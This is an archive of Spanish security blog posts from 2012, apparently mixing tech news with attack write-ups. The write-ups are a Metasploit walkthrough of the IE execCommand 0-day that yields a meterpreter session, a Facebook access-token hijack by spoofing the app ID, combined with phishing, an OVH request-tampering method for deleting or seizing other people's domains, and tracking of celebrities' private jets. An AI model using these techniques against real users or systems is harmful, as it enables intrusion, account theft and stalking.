jueves, 27 de septiembre de 2012

0-day en IE y Metasploit, al ataque!!

  Hace unos días aparecía una vulnerabilidad (un 0day) que afecta a diferentes versiones de Internet Explorer (IE 7, 8 y 9) y a las diversas versiones del sistema operativo de Microsoft que lo utilizan (Windows XP, Windows Vista y Windows 7). Hoy leyendo mis RSS leo en Flu-Project que Metasploit ya lo tiene implementado, así que vamos a ver como utilizarlo :D

  Lo primero, SIEMPRE, antes de utilizar Metasploit, hay que actualizarlo, para ello:

msfupdate
  una vez este al día lo iniciamos con:
msfconsole 
 y veremos su bonita presentación (son geniales los banners de metasploit xD):


  Lo siguiente es seleccionar el exploit a utilizar, para ello:
use exploit/windows/browser/ie_execcommand_uaf

 Siempre que vamos a ejecutar un exploit o cualquier funcionalidad que ofrece metasploit, es recomendable el comando info que nos mostrara informacion del mismo:
info

 En este caso vemos que el exploit funciona sobre:

  • IE7 en Windows XP SP3
  • IE8 en Windows XP SP3
  • IE7 en Windows Vista
  • IE8 en Windows Vista
  • IE8 en Windows 7
  • IE9 en Windows 7

 Las pruebas las se han realizado sobre un Windows 7 con IE 8, pero teóricamente soporta todas esas versiones y SO.

  El siguiente paso es especificar la IP del servidor donde se preparará el exploit, es decir, nuestra IP, para ello:
set SRVHOST <IP>
en el ejemplo:
set SRVHOST 192.168.0.111
y por último lanzar el exploit:
exploit 

  Con esto el servidor se quedará en espera de conexiones, entonces, cuando la víctima acceda a la dirección que nos mostrará Metasploit (campo Using URL), se lanzará el exploit :D



  Al final de todo el proceso, sino ha habido ningún problema, tendremos una sesión de meterpreter:
sessions -l


  Listo, ya está todo el proceso, y al ser una vulnerabilidad 0day todavía no está corregida aumentando su peligrosidad.

  Si queréis más información, aquí tenéis una entrada del blog de rapid7 => https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit


Nos leemos en breve ;)


Fuente

Immunity Stalker: Analizando tráfico de red en la nube

Hace unos días me pasaron un usuario y contraseña del servicio de Immunity llamado Stalker que habían presentado en la Infiltratre 2012 - lo cual agradezco mucho - y he pasado un rato jugando con él. Para los que no hayáis oído hablar de él, la idea de la solución es poder automatizar el análisis de capturas de tráfico para buscar los datos importantes y mostrar en un panel de control toda la información descubierta.
Figura 1: Aspecto general de Immunity Stalker
Stalker analiza las capturas pcap a la perfección, así que para no andar hackeando a ningún vecino cercano, decidí hacer un poco de hacking con buscadores y buscar ficheros .pcap que la gente hubiera dejado publicados por Internet como pruebas de concepto, datos de prueba, etcétera. En esos ficheros a veces se cruzan datos que no debieran, como nos pasó a nosotros en un reto hacking, por lo que pensé que sería una buena forma de probar la solución.
Figura 2: Carga de datos en Stalker
La herramienta permite subir datos en diferentes formatos, y además los va analizando con procesos en paralelo, por lo que puedes seguir trabajando mientras se analizan los datos. Una vez terminado, cada nuevo host descubierto tendrá una representación en el panel lateral de la izquierda con el número total de paquetes en los que aparecía dicho equipo. A la derecha los datos analizados.
Figura 3: Analizando hosts con Stalker. Imágenes, enlaces y búsquedas en Google
Como se puede ver, el análisis busca información muy útil como los sitios DNS consultados, las conversaciones de Facebook, los usuarios y las contraseñas que se puedan descubrir, los ficheros transmitidos, o los mensajes de correo electrónicos que puedan extraerse.
Figura 4: Contraseñas descubiertas con Stalker
Evidentemente hay que tener en presente de que es un servicio online, así que si la captura es muy grande el tiempo de subida puede ser un handicap, pero una vez allí es muy cómodo obtener información jugosa.
Figura 5: Conexiones DNS, Beacons de WiFi y e-mails
Por supuesto, el análisis completo de un pcap puede necesitar una revisión manual para sacar todo el jugo que puedan ofrecer los datos que allí hay, pero hay que reconocer que la herramienta es una chulada. Mil gracias por la cuenta de demo.


lunes, 24 de septiembre de 2012

Almacena tu colección de malware con Malwarehouse

Scott Roberts ha publicado un sencillo script en Python para almacenar y consultar muestras de malware en una base de datos SQLite. El proceso es simple; permite el almacenamiento (indexando los metadatos básicos de las muestras) y la recuperación de sus muestras. La base de datos permite realizar búsquedas por nombre del fichero, hash MD5 o hash SHA256. 

La herramienta se llama malwarehouse y puede ser descargada aquí. Es recomendable cambiar la ruta de la base de datos ya que por defecto apunta a "~/Desktop/malwarehouse/", ruta inexistente si en nuestro sistema no tenemos X-Windows: option_base_dir = os.path.expanduser("~/malwarehouse/")

Veamos su funcionamiento básico:
  • Primero un simple menú:


  • Introducciendo una muestra de malware en la base de datos SQLite:
guy@seeker:~/malwarehouse$ ./malwarehouse.py -s zz87lhfda88.com -t PWS-LegMir.dll -n "Low detection" 1.exe
  • Resultado cuando la muestra de malware 1.exe es procesado:
guy@seeker:~/malwarehouse$ ./malwarehouse.py -s zz87lhfda88.com -t PWS-LegMir.dll -n "Low detection" 1.exe
Parsing Malware
Analysis complete. Loading.
Sample 1.exe loaded...
Loading Malware 1.exe
Creating /home/guy/malwarehouse/41f5e475e086c991873a35c58234213fc01331d655f3f39a2f1a6d2f0e0ed6b8

  • Revisando el último registro con los 3 métodos disponibles:
guy@seeker:~/malwarehouse$ ./malwarehouse.py -f 41f5e475e086c991873a35c58234213fc01331d655f3f39a2f1a6d2f0e0ed6b8
guy@seeker:~/malwarehouse$ ./malwarehouse.py -f 4f871a6b9f17c0923963e7dfc73efa58
guy@seeker:~/malwarehouse$ ./malwarehouse.py -f 1.exe



  • Consultando los últimos registros insertados en la base de datos malwarehouse:


En definitiva, si estás buscando una manera simple y efectiva para el seguimiento de tus ejemplares de malware, malwarehouse es probablemente lo que buscas...

Fuentes:
blog.thevigilant.com
https://github.com/sroberts/malwarehouse

http://isc.sans.edu/diary/14161

domingo, 23 de septiembre de 2012

El hombre que hackeó por error el Banco de Francia con la contraseña "123456"


  Una corte en Francia dejó libre –y declaró que no había hecho nada malo– a un hombre que admitió que ingresó a un servidor del Banco de Francia por error.

El año 2008 el tipo estaba desempleado y, tratando de usar números de tarificación adicional por Skype, marcó un número al azar que sólo le solicitó una clave, sin entregarle más información de lo que era. El tipo simplemente marcó “123456″ y terminó ingresando en el servicio de deudas del Banco de Francia.

El banco detectó el ‘hackeo’ y demandó al tipo pese a su insistencia de que fue ‘sin querer’. Lo más ridículo es que la policía recién lo arrestó el 2010, tardando dos años en encontrarlo pese a que usó su dirección real en Skype (además de notar que su computador era ‘demasiado viejo para cometer cibercrímenes’).

Fuente

Colas de hasta tres días para comprar el iPhone 5


 
Alrededor de 600 personas hicieron cola para entrar en la tienda de Apple en el centro de Sidney, en el momento en que el iPhone salió a la venta. La mayoría de clientes compraba de uno a dos smartphones. En Tokio, el día era lluvioso pero las colas ocuparon las calles cercanas.

Algunas compañías de pago tuvieron que alinear y colocar a la gente, que buscaba ser fotografiada por ser la primera del mundo en tener en sus manos los nuevos dispositivos. A la cabeza de la cola estuvo Todd Foot durante tres días. Vestía ropa con comparaciones de precios.

Siento que si dejo el iPhone en casa, me vuelvo un poco loco El personal de tiendas que compran y venden productos de Apple vagaba por las largas filas ofreciendo café gratis. La mayoría de los camareros eran aficionados a los iPhones anteriores de Apple y la tableta iPad.

"Siento que si lo dejo en casa, me vuelvo un poco loco", dijo el estudiante de 20 años de edad, James Vohradsky, sobre su iPhone actual. "Tengo que volver a casa a buscarlo. No puedo hacer mi día normal sin él", dijo Vohradsky. Este había hecho cola durante 17 horas con su hermana menor.

Algunos analistas esperan que Apple venda hasta 10 millones de iPhone 5 en los últimos días de septiembre.

JP Morgan estima que la liberación del teléfono podría proporcionar un aumento de 3.200 millones de dólares (2.464 millones de euros) para la economía de Estados Unidos en el cuarto trimestre.

Por otro lado, las colas en las tiendas de Tokio ocupaban varios metros cuadrados sobre las calles. Por ello, uno de los dos operadores que venden el iPhone 5 en Japón, expresó su preocupación ante la capacidad de producción de Apple para satisfacer esta demanda.


El presidente y fundador de Softbank, Masayoshi Son, dijo que la demanda para el iPhone 5 es mayor que la del primer iPhone. En este sentido, el otro transportista japonés que ofrece el iPhone, KDDI, dijo que se había quedado ya sin existencias del iPhone 5.

El nuevo teléfono tiene una pantalla de 4 pulgadas y es más delgado y mucho más ligero que el modelo anterior. El iPhone 5 es compatible con las redes móviles 4G y también viene con una serie de actualizaciones de software, incluyendo los nuevos mapas de Apple.


FUENTE

¿Es el Lumia 920 mejor que el iPhone 5? Según Nokia, si



El sitio de Nokia en el Reino Unido publicó una imagen titulada “Las cosas buenas llegan a aquellos que esperan” que evidentemente dirigida a todos los fanáticos y clientes potenciales de Nokia que han decidido esperar a que salga a la venta el nuevo Lumia 920.

A diferencia de otras campañas publicitarias donde las compañías buscan desprestigiar e insultar a la competencia, Nokia no recurre a estas prácticas, por el contrario solo se limita a comprar las funciones del iPhone 5 dadas a conocer por la misma Apple y lo que el Lumia 920 puede hacer.

Tal vez sea la forma en la que hicieron el gráfico, tal vez sea la suave luz que acaricia los pixeles de la pantalla pero, en la mayoría de los puntos comparativos Nokia parecer ganar, claro, excepto en el apartado de accesorios donde Apple tiene una gran, enorme, gigantesca, brutal ventaja sobre la empresa que sea.

Vean y juzguen por ustedes mismos.


Fuente

eGarante: Un perito digital online que sella webs y correos

Como peritos informáticos nuestra principal tarea en muchos casos es realizar pruebas y documentar los resultados para generar evidencias. Este trabajo puede ser el ejecutar un comando netstat o realizar un listado de ficheros en una carpeta que serán adjuntados en un informe pericial avalado por nosotros. En el caso de trabajar con evidencias temporales online, realizamos trabajos como la captura de la misma, y su firma, para a partir de ese momento poder verificar en todo momento que estamos trabajando con una evidencia capturada en un determinado instante de tiempo.
En el caso de ser necesario utilizar como evidencia algo publicado en una web, las pruebas suelen ser descargar la web y firmarla digitalmente para incluirla dentro del informe final y poder, en caso de tener que ir a presentar y defender el informe en un juicio, garantizar personalmente que nosotros hicimos esa prueba y esos fueron los resultados en una determinado instante de tiempo, por lo que es fundamental poder contar con herramientas que hagan uso de timestamping.
Para explicar la importancia de las evidencias en la web siempre pongo el caso del entrenador de fútbol Luís Aragonés, que tras perder un encuentro cuando entrenaba al Atlético de Madrid, dijo en televisión algo como: "Quiero dejar de entrenar al Atlético de Madrid". Los cuerpos jurídicos del club decidieron aprovechar esta afirmación verbal y le enviaron una carta que decía: "Aceptamos su dimisión". Por supuesto, Luís Aragonés, viendo que había metido la pata tuvo que negociar una salida del club en unas condiciones económicas muy desfavorables para él.
Por supuesto estas evidencias no necesitan ni estar firmadas digitalmente, y un juez puede dar como bueno un documento en Word con capturas de pantallas realizadas y guardadas, algo que ha permitido a la ex alto cargo de la Comunidad de Valencia ser exculpada en el caso Noos, pero si esas evidencias están firmadas por un tercero que ejerce de perito judicial, mejor que mejor.
Cualquier persona puede firmar digitalmente una evidencia web de comentarios en Twitter que hagan apología del terrorismo, que insulten a personas, o que hablen mal de su trabajo. Incluso si esos comentarios se realizan de forma anónima, documentar todos esos comentarios pueden servir para que se abra una investigación judicial, y con ella abierta será mucho más sencillo conseguir del proveedor que da el servicio los datos de conexión de la cuenta para poder identificar a la persona que hay detrás, que tendrá que responder por los insultos publicados en el pasado de forma anónima. Por supuesto, esto también sirve para comentarios en blogs o foros que comentan delitos.
Si la evidencia está en la web, el servicio eGarante, creado por Yago Jesús (@YJesus), puede ayudarte a simplificar todo el proceso, ya que funciona como un perito digital online que realiza esta misma prueba, es decir, descarga la web, y la firma con el sello de tiempo del momento en que se realizó la comprobación. Lo que permite a cualquier persona documentar una evidencia de forma muy sencilla.
Figura 1: Petición de firma de un Tweet de mi cuenta Twitter
El servicio, una vez firmada la web, enviar un correo electrónico con un documento PDF firmado, que puede verificarse tal y cómo explica la web de eGarante. La verdad es que esta parte de generar así de fácil evidencias webs firmadas y selladas me parece muy cómodo y muy útil.
Figura 2: El documento PDF generado, firmado y sellado por eGarante
Este servicio también está disponible para mensajes de correo electrónico. En este caso la firma se realiza de todo el mensaje SMTP enviado, lo que no garantiza que el mensaje ha sido recibido, sino que ha sido enviado. Hay que tener en cuenta que un filtro antispam en el servidor de correo entrante o en el mismo cliente de correo del destinatario, o un simple error técnico, pueden evitar que el mensaje llegue, pero sí se garantiza el acto de enviar el correo. Para ello hay que enviar en copia del mensaje a la dirección mailsigned@egarante.com y se recibirá un mensaje con un documento PDF conteniendo el mensaje firmado y sellado.
Esto puede ser útil para concursos en los que hay que enviar un mensaje antes de una determinada fecha, lo que podría en algún caso ayudar a demostrar el acto de envío.
Unas reflexiones personales sobre eGarante
Tras probarlo, la parte de firma digital de evidencias web me parece muy cómodo y útil. Echo de menos el no tener que instalar la clave pública de la CA de eGarante, que creo que va a limitar en gran medida el uso, solo por tener que realizar un proceso de confianza en una nueva CA. Creo que estaría bien añadir una CA firmada por alguna de las entidades de firma digital reconocidas en España.
Por otro lado, echo de menos una Política de Seguridad más clara, sobre todo de cara al envió de mensajes de correo electrónico, ya que el poner a mailsigned@egarante.com en copia implica que le hago destinatario también de lo que envió, y para correos con contenido importante, no es lo deseable.
En la parte web, que es la que más me gusta, hay que tener en cuenta que si la información que se quiere documentar está protegida tras una sesión, entonces este servicio no vale, ya que solo documenta las partes públicas y sería necesario hacerlo manualmente.
La última duda es una curiosidad técnica que tengo que preguntarle a Yago Jesús es cómo hace para no firmar los correos de spam que lleguen a mailsigned@egarante.com, ya que puede ser muy gracioso devolver los correos del nigeriano firmados a los estafadores.


Recopilatorio de trucos para el terminal de Mac OS X


Terminal.app es un emulador de terminal que ya deberías estar usando en tu Mac OS X. Tanto si ya lo haces como si no, te recomendamos echar un vistazo al siguiente recopilatorio de Federico Viticci (Macstories), donde encontrarás más de 250 comandos, hacks, trucos y tutoriales:
  1. Top 15 Terminal Commands for Hidden Settings in Snow Leopard
  2. Top 50 Terminal Commands
  3. 9 useful MAC OS console commands
  4. Sync to Dropbox from anywhere in your home folder
  5. Force Safari to open target links in new tab rather than window
  6. Tweak Screencapture Behavior
  7. Managed Client: How to disable Exposé and Spaces
  8. Ten OS X Command Line Utilities you might not know about
  9. Edit A Text File In Terminal
  10. Useful Mac OS X Terminal Commands
  11. Flush DNS Cache
  12. Send Email From Gmail From the Command Line
  13. Remove Google Software Update on Mac OS X
  14. Tweeting To Twitter From Terminal
  15. See which processes are using the Internet
  16. Revealing Mac OS X’s Hidden Single-Application Mode
  17. Enabling Terminal’s directory and file color highlighting in Mac OS X
  18. 40 Useful Mac OS X Shell Scripts and Terminal Commands
  19. 10.6: Disable and enable Rosetta via Terminal
  20. 25 Terminal Tips Every Mac User Should Know
  21. 15 Terminal commands to supercharge OS X
  22. Handy Terminal commands for Mac OSX Leopard #1
  23. Customizing Terminal in Mac OS X 10.5
  24. Blurminal, Yeah, add some blur for your terminal windows
  25. Top 50 Terminal Commands
  26. Basic Terminal Commands for Mac OS X
  27. How to Convert DMG File to ISO Using Terminal on Mac
  28. TerminalColors
  29. A black OS X Leopard Terminal theme that is actually readable
  30. 5 Most Useful Terminal Command Utilities
  31. Introduction to Terminal for Disk Maintenance
  32. Create Mac OS X AppleScript application to call Unix/terminal commands
  33. Mac Terminal Shortcuts
  34. 10.6: Globally enable text substitutions and spell check
  35. Themed Tab Terminal for OSX Leopard
  36. Twitter While You Sleep
  37. Change Terminal Focus with Mouse Over
  38. Leopard Tweaking – Another Terminal Commands
  39. Leopard – Terminal Commands for Desktop
  40. Leopard Tweaking – Terminal Codes
  41. Terminal Tips: Disable annoying application crash dialogs
  42. Compare two folders’ contents in Terminal
  43. Block access to specified sites by modifying /etc/hosts
  44. Activate Mac OS X’s Terminal using a keyboard shortcut
  45. Top Mac Tweaks Using Terminal
  46. REALLY big Dock magnification
  47. sudo shutdown -h +10 for autoshutdown in 10min
  48. iTerm
  49. ssh -D 9999 username@serverip + SOCKS proxy

Fuente

jueves, 20 de septiembre de 2012

Aplicaciones de Facebook y Privacidad (3 de 3)

Para lograr que con solo navegar a una determinada URL se genere un Access_Token con todos los permisos sin que el usuario los haya aceptado antes, realizando unas pruebas me topé con las aplicaciones desarrolladas por Facebook. Todas estas aplicaciones creadas por los mismos desarrolladores de Facebook no piden permisos al usuario debido a que para ellas no es necesario porque son del mismo Facebook. Algo como suele hacer Apple con sus aplicaciones o ... bueno, ya sabéis.

Esto lo puedes comprobar fácilmente ya que cuando cualquier aplicación en tu iPhone o Android quiere acceder a tus datos en Facebook es necesario darle los permisos, mientras que cuando usas Facebook para iOS o Facebook para Android esto no es así. Es decir, estas aplicaciones tiene una categoría especial que les permite acceso total a tus datos, o lo que es lo mismo, generar un Access_Token para ellas sin interactuar con el usuario. Las aplicaciones que son de Facebook son las que están en Facebook Apps y alguna otra más que no está por ahí.

Conocido esto, es posible suplantar la petición que hace Facebook para iPhone con el objetivo de conseguir un Access_Token con todos los permisos. Si miramos la petición que hace esta aplicación, se puede ver lo siguiente:
https://www.facebook.com/dialog/permissions.request?app_id=6628568379&next=https://facebook.com/connect/login_success.html&response_type=token
Como se puede ver, lo que devuelve esta URL es un Access_Token con todos los permisos para acceder a la cuenta del usuario. Esta es la redirección que se obtiene, con el Access_Token.
https://www.facebook.com/connect/login_success.html#access_token=AAAAAAYsX7TsBAEmjMvxnhzHd6EjaGrGZBnrVsYsdsac
HLGNDQiWhOtYHeJpAbA4[CENSORED]MBaodL8r6OsBe6EXkbG1hnumon0YP7xTAvnp
YFb&expires_in=87731
Y así, a lo tonto, en ese Acces_Token está el acceso a toda nuestra cuenta, es decir, como si fuera el usuario y la contraseña.

Figura 6: Surprise!

Una key que permite acceder a todos los datos de la cuenta. Por supuesto, para obtener ese Acces_Token de cualquier persona hace falta un poquito de ingeniería social, que haga clic en un enlace malicioso y conseguir el Access_Token de la respuesta mediante un script.

Como Facebook aun no ha hecho nada para corregir eso, la gente malvada y los empresarios de moral distraída y técnicas de Black SEO han comenzado a crear servicios en Internet que te ponen 1000 likes - como el tipo que se cambió el nombre por Mark Zuckerberg por ser baneado y denunciado por Facebook - en estados, fotos, comentarios, etcétera, debido a que almacenan miles de Access_Tokens y los usan para dar el servicio, es decir, te piden tu código y usan los códigos de los demás para darte el servicio, y así sucesivamente.

Hay miles de maneras de robarlo y las mass sencillas son mediante trucos de Phishing, o servicios  de engaño como saber quién usa tu perfil, eliminar la biografía, o saber cuentas que existen en Facebook. Si lo quieren hacer menos llamativos, a los Phishers les bastará con cambiar el esquema de Phishing y pedir a las víctimas que, en lugar de insertar la contraseña y el e-mail, inserte ese Access_Token para ver la información privada de una persona... o lo que se les ocurra.

Como prueba de concepto de la gravedad de esto programe una aplicación que permite realizar distintas funciones como leer los mensajes, ver notificaciones, actualizar estado, dar likes y más con solo ingresar el código de acceso, con la que jugué e hice muy popular algún post gracias a Acces_Tokens cedidos por amigos. Aquí una imagen del programa.

Figura 7: Extrayendo info de una cuenta con un Access_Token "robado"

En este caso, probando la aplicacón con mi cuenta, lo que hice es acceder a toda mi lista de contactos y mostrar el ID, el nombre del contacto - en otras palabras el e-mail de Facebook - y el e-mail de la persona - si no lo han ocultado -. En definitiva muestra a quién le gustaría que le suplanten la identidad en Facebook, ya que tiene el e-mail público - ¡Chema, ponlo público! -.

Seguramente a alguno le llamara la atención la imagen de la Foca allí. Es una función del Graph API de Facebook que se llama “metadata” y lo que hace es listar todas las URLs que contienen los datos del usuario. Y a mí me gusta la FOCA.

En definitiva, la creación de Access_Tokens sin validación por parte del usuario, simplemente suplantando el ID de una aplicación de Facebook es un bug demasiado gravé, del que estoy seguro que Facebook tiene constancia viendo las empresas que bloquea y demanda. Ahora hay que ver si con la difusión masiva lo cierran - aunque sería más engorroso para las aplicaciones Facebook -

Ariel Ignacio La Cono
ignataur@hotmail.com

*********************************************************************************

No hackees a otros, hackéame a mí



HACK.ME es un proyecto social, abierto a cualquiera y concebido para ser el lugar en el que investigadores, instructores y estudiantes de seguridad de aplicaciones web puedan practicar con multitud de entornos vulnerables. Se trata de una plataforma donde las aplicaciones web vulnerables pueden ser creadas y compartidas al igual que se hace con una aplicación móvil en el Mobile App o el Apple Store y se puede ejecutar código al vuelo de forma segura. El objetivo: crear nuevos casos de estudio (aplicaciones vulnerables) de forma fácil y rápida con el fin de proporcionar a los estudiantes siempre nuevos escenarios para jugar.

HACK.ME utiliza Coliseum, un compendio de librerías que se encargan de la distribución de sandboxes en el sistema de archivos/sistema operativo, servidor web y base de datos y se encarga de las aplicaciones web vulnerables se ejecuten de forma aislada en la plataforma. No hay ninguna máquina virtual en cuestión. Coliseum se encarga de tomar el código fuente de una aplicación web, instanciarla en un Sandbox y ejecutar el programa bajo un subdominio nuevo en coliseumlab.net, hack.me u otro. Y en unos pocos segundos, no en minutos u horas.

Laboratorios virtuales para la seguridad de las aplicaciones web, y para todos, a partir del próximo 9 de octubre!: http://hack.me/




lunes, 17 de septiembre de 2012

Pull the Plug: Bureaucratic Denial Of Service (3 de 4)

Continuando con la Fase 1 de Búsqueda de información, en OVH fue posible encontrar otro punto interesante para la recogida de información: Las órdenes de pedido.

Data Leak en el sistema de órdenes de pedido en OVH.

Respecto a las órdenes de pedido, el problema reside en que, tras completarse satisfactoriamente el proceso de pago, las órdenes se enlazan automáticamente con la factura correspondiente - que es la que nos interesa por contener toda la información necesaria para solicitar una orden de gestión sobre el servicio, tal y como se vio en el apartado anterior -.

Cabría esperar un sistema de gestión como el que se utiliza en el sistema de facturas - con un identificador y la contraseña asociada al mismo - pero, en este caso, basta con conocer la orden de pedido y tener una cuenta en OVH, pudiéndose crear con datos falsos una cuenta temporal sin problemas para que podamos acceder al identificador y la contraseña enlazados a la misma. Además, OVH no no incorpora en su web ningún sistema que evite la creación automática de cuentas.

Figura 13: Acceso a una orden de pedido sin contraseña
Como podréis observar en la petición, a pesar de que el sistema solicita una contraseña para la orden de pedido, el sistema, al recibir las credenciales válidas de una cuenta de OVH, obvia la contraseña dando acceso directamente a la orden solicitada. Como podemos observar, al final es posible obtener toda la información de cualquier persona que haya contratado alguna vez un servicio con OVH.

Fase 2: Solicitud de borrado de dominio ("Pull the Plug")

Al igual que en los sistemas de gestión de facturas comentados anteriormente, es importante controlar el proceso por el cual se realizan las solicitudes de bajas de servicios, controlando en todo momento si la cuenta que está cursando la petición tiene realmente contratado ese servicio o no. Una mala gestión de estos procesos puede provocar tanto la realización automática de un número considerable de solicitudes que ralentizen, e incluso colapsen, el sistema como, en el caso de que no se realice ninguna comprobación de la identidad de la persona que la está cursando, la eliminación directa del servicio (sin la necesidad de realizar el tercer proceso comentado en el inicio).

En el caso de OVH, cabe destacar que el sistema no gestiona correctamente el proceso de solicitud de baja de servicios, pudiendo realizar solicitudes de bajas de servicios que no están asociados a nuestra cuenta, realizando todo el proceso como si fuéramos la cuenta legítima.

Cuando se quería cursar la baja de un servicio (nombres de dominio DNS, servidores dedicados, etcétera) se tenía que acceder al apartado "Procedimientos" dentro de la sección de administración de nuestra cuenta falsa.

Figura 14: Procedimientos que pueden solicitarse desde el panel de administración de OVH

Como se puede observar en la imagen superior, se muestra un listado con todos los procedimientos disponibles. En este caso vamos a tratar la parte de solicitudes de baja de servicios pero, como se puede observar, también sería posible cursar una orden de cambio de propietario de un dominio y asignárselo a otra cuenta bajo nuestro control - dejando de lado aquellos dominios que sean gestionados por NICs nacionales, como es el caso de los ES que esa es "otra historia" -. A partir de ese momento obtendríamos el control del dominio pudiendo, en vez de hacer una ataque de denegación de servicio, redirigir a los usuarios a, por ejemplo, páginas de phishing.

Una vez que se accedía al procedimiento de destrucción de dominios se mostraba la información de la cuenta asociada a esos dominios, es decir, los datos de la cuenta de la sesión activa, los dominios disponibles y la opción de elegir una fecha de destrucción - en nuestro caso, inmediatamente que podremos comprobar más adelante que la solicitud será validada en unos días -.

Figura 15: Listado de servicios que pueden gestionarse

La vulnerabilidad del sistema residía en el tratamiento de los datos de la cuenta que cursa la petición. Como podemos observar, y se ha comentado anteriormente, en la página para cursar la solicitud se mostraba la información de la cuenta que realiza el procedimiento. El problema se encuentra en que, lejos de ser un dato meramente informativo, esa información se utiliza para cursar la solicitud en vez de obtenerse del lado del servidor nuevamente a partir de la sesión que está realizando la solicitud.

De esta forma, si conocemos los datos de contacto del propietario y el identificador de la cuenta asociada al dominio - por eso es necesario el primer paso de obtención de información, porque el nombre y apellidos son muy fáciles de obtener pero el identificador no, y es imprescindible - se podría cursar una solicitud de destrucción de dominio en su nombre.

Figura 16: Tampering de datos, para cambiar los datos del domino a solicitar la baja

Además, puesto que estamos facilitando el e-mail de contacto - nuevamente, en vez de obtener del lado del servidor el que le corresponde a la cuenta que está cursando la solicitud -, podemos modificarlo por uno bajo nuestro control para evitar que el administrador de ese dominio reciba en ningún momento una notificación de la puesta en marcha del procedimiento. Así, todo el proceso sería oculto y en ningún momento tendría la oportunidad de bloquearlo porque todo el procedimiento se gestionaba con la cuenta que solicita la petición de baja, y no con la dueña del dominio.

Una vez lanzada la petición se recibirá un e-mail de confirmación explicando todo el proceso a realizar para que Validar la orden de borrado y que sea aceptada la solicitud. Por lo tanto, como podéis observar, de una forma tremendamente sencilla es posible crear en el sistema un expediente de destrucción de dominio y ocultar, al administrador, todo el proceso que a la semana se quedaría sin dominio sin saber por qué.

Ahora sólo quedaría validar la petición.

********************************************************************************* - Pull the Plug: Bureaucratic Denial Of Service (1 de 4)
- Pull the Plug: Bureaucratic Denial Of Service (2 de 4)
- Pull the Plug: Bureaucratic Denial Of Service (3 de 4)
- Pull the Plug: Bureaucratic Denial Of Service (4 de 4)
*********************************************************************************
Realizando una investigación con mi amigo Juan Pablo Hincapié, excelente comunicador social con el que pronto sacaré un curso sobre seguridad informática para periodistas, nos dimos a la tarea de rastrear la ubicación de algunos famosos, algo que ya habíamos hecho en La Comunidad DragonJAR con el articulo “cómo localizar usuarios de twitter y flickr a través de sus fotos“, pero utilizando en este caso un nuevo vector de ataque… sus aviones “privados”.

Aviones Privados de Famosos Los aviones de los famosos no son tan privados

Los ricos y famosos pueden permitirse evitar las largas colas en los aeropuertos, las escalas a los que muchos nos sometemos para ahorrarnos unos cuantos dólares y las molestias de viajar en vuelos comerciales comprando sus propios aviones privados. Lo que se tratará de demostrar en este artículo, es que no importa lo costoso que le pueda salir el “juguetico” a estos individuos, siempre se les podrá localizar.
Claro que no todo el mundo relacionado con el espectáculo puede acceder a un lujo como este. La lista de los personajes que poseen un jet privado es más pequeña de lo que pensaríamos y son pocos los que de verdad se arriesgan a comprar, en vez de alquilar un medio de transporte como este. Entre algunos de los que conforman este prestigioso club están el “gurú” de los bienes raíces, Donald Trump; el filántropo estadounidense de los sistemas, Bill Gates; El controversial cantante y novio de Beyonce, Jay Z, y por último, pero no menos importante, el hombre más rico de Rusia, Roman Abramovich.
Y es que este multimillonario ruso se las trae. Hace algunos años se dio a conocer en el ámbito mundial, luego de adquirir el equipo londinense Chelsea F.C. y realizar fuertes inversiones en la economía británica. Pero Abramovich no sólo es famoso por sus inversiones de alto riesgo, hace algunos años compró un Boeing 767-300, nada más y nada menos que por la “bobadita” de 100 millones de dólares y fuertes rumores indican que ya adquirió un Airbus valorado en 350 millones de Euros..
Realizando una sencilla búsqueda en Internet, llegamos al siguiente vídeo donde nos encontramos con información confidencial como el numero de la matricula, en este caso P4-MES
Utilizando el numero de la matricula del avión y buscándola en bases de datos publicas con itinerario de vuelos como flightradar24 o flightaware podemos tener un completo historial de los viajes realizados por Abramovich en su avión “privado”.

Avion Privado Abramovich 300x197 Los aviones de los famosos no son tan privados

Corroborando lo que nos arroja el itinerario de su avión privado con las noticias locales podemos comprobar que efectivamente Roman Abramovich se encontraba en Alaska a finales de agosto de este año, por lo que confirmamos que efectivamente se trata de su avión privado y podemos seguir todos sus movimientos.
Pero no solo el billonario ruso puede permitirse esos lujos, nuestra querida Shakira, esa misma la de Ublime, hace poco compró un avión privado de segunda (lo que llamamos segundazo) por la insignificante suma de 4 millones de dólares al que curiosamente denominó el “Waka avión” no es tan lujoso como el de abramovich, pero con esta “pequeña” inversión puede pasar de todas las molestias que sufrimos los “simples mortales” y evitar al típico fan molesto que te pide algo en el peor momento.
De lo que no se puede librar el Waka Avión, es de ser rastreado en tiempo real y que cualquier mortal pueda monitorear su historial de vuelo.  Para llegar a los datos que necesitamos del avión de Shakira, realizamos la misma investigación que con el ruso Abramovich, buscamos primero información de la compra del avión en motores de búsqueda, donde nos enteramos del precio de compra, el apodo que le puso y lo mas importante el modelo del mismo FALCON 50, con este nuevo dato y buscando en google imágenes con la palabra Shakira FALCON 50, nos topamos con la pagina jetphotos.net que nos muestra una bonita foto del FALCON 50 de Shakira.

Avion Privado Shakira Los aviones de los famosos no son tan privados

De esta pagina no solo confirmamos gracias a los comentarios que efectivamente se trata del avión privado de Shakira, sino que podemos extraer su matricula N860BA, que utilizaremos para rastrear los trayectos que realiza desde el waka avión (podemos buscar directamente la placa en google para confirmar la información).
Con la placa del avión privado de Shakira en nuestras manos, la siguiente tarea es buscar los trayectos realizados por la artista colombiana en bases de datos publicas como flightaware y flightwise donde encontramos la siguiente información.

Itinerario de Shakira 300x291 Los aviones de los famosos no son tan privados

Como pueden apreciar tenemos acceso a todo el itinerario de la artista en los últimos 4 meses (de forma gratuita) y desde el año 1998 (en la versión paga) de flightaware, datos que podemos corroborar, con las fotos aportadas por airport-data o airliners.
¿Que pueden hacer estos famosos para evitar las miradas curiosas de cualquier persona a sus itinerarios de vuelo?, seguir el ejemplo de John Travolta, quien ha utilizado el recurso de bloqueo para que su avión N707JT al que llegamos por los mismos medios que los anteriores….

Avion de Jhon Travolta Los aviones de los famosos no son tan privados

No aparezca en las bases de datos publicas como flightaware o flightwise evitando que sus vuelos sean monitoreados por cualquier persona con una conexión a Internet.

Avion Bloqueado Los aviones de los famosos no son tan privados

Con lo que no contaba Travolta es que airliners y airplane-pictures son iniciativas mantenidas por voluntarios que no tienen en cuenta el bloqueo que se realiza a las bases de datos públicas y siempre que puedan tomar fotos a una aeronave lo harán, por tanto desde estos sitios seguimos teniendo acceso a parte del itinerario realizado por Travolta aunque el no quiera.

